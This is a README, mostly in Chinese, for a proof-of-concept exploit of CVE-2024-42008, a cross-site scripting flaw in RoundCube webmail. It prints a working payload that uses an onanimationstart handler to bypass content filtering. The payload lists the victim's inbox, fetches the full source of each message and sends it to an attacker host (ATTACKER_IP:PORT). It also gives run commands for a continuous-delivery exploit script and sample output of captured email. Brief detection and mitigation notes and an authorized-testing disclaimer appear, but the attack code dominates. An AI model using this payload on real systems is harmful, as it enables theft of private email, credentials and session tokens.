
Proof-of-concept exploit for CVE-2024-42008, a Cross-Site Scripting vulnerability in RoundCube webmail. Delivers XSS payloads via contact forms to steal emails, credentials, and session tokens in authorized penetration testing environments.
本仓库包含针对 CVE-2024-42008(RoundCube 网络邮件应用中的跨站脚本漏洞)的概念验证利用工具。该工具仅用于教育目的及 HackTheBox 等受控渗透测试环境。
该漏洞存在于 rcmail_action_mail_get->run() 中,允许远程攻击者在受害者浏览器中执行任意 JavaScript。缺陷源于处理邮件内容时输入验证不足,尤其是在处理 CSS 动画和 JavaScript 执行上下文时。
关键攻击向量:
onanimationstart 事件处理程序绕过内容过滤器成功利用可使攻击者:
该利用工具包含三个主要组件:
// 核心 XSS 有效载荷使用 CSS 动画触发 JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
// 1. 从受害者收件箱获取邮件列表
fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
.then(r=>r.text())
.then(t=>{
// 2. 使用正则表达式提取邮件 UID
[...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
// 3. 对每封邮件,获取完整源码
fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
.then(r=>r.text())
.then(data=>{
// 4. 将邮件数据泄露至攻击者服务器
fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
})
})
})
; foo=bar">
pip install requests
# 单次有效载荷投递
python cve-2024-42008-exploit.py
# 持续模式(每30秒一次)
python cve-2024-42008-exploit.py -c
# 自定义间隔(每60秒一次)
python cve-2024-42008-exploit.py -c -i 60
# 调试模式带代理
python cve-2024-42008-exploit.py -d
编辑脚本以配置:
ATTACKER_IP:你的监听服务器 IPATTACKER_PORT:接收泄露数据的端口RECIPIENT_EMAIL:目标邮件地址TARGET_URL:存在漏洞的 RoundCube 实例PROXY:调试用的代理服务器(Burp Suite/Caido)| 选项 | 描述 |
|---|---|
-d, --debug | 启用调试模式并支持代理 |
-c, --continuous | 持续发送有效载荷 |
-i, --interval | 有效载荷间隔(默认:30秒) |
检测指标:
onanimationstart 事件处理程序缓解策略:
测试注意事项:
⚠️ 警告:此利用工具仅用于教育和授权测试目的。
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200
[+] 📩 Captured Email Data:
Return-Path: <[email protected]>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log
本代码仅用于教育目的和授权渗透测试。作者不对因使用本软件造成的任何滥用或损害负责。在测试任何系统前,请确保已获得适当授权。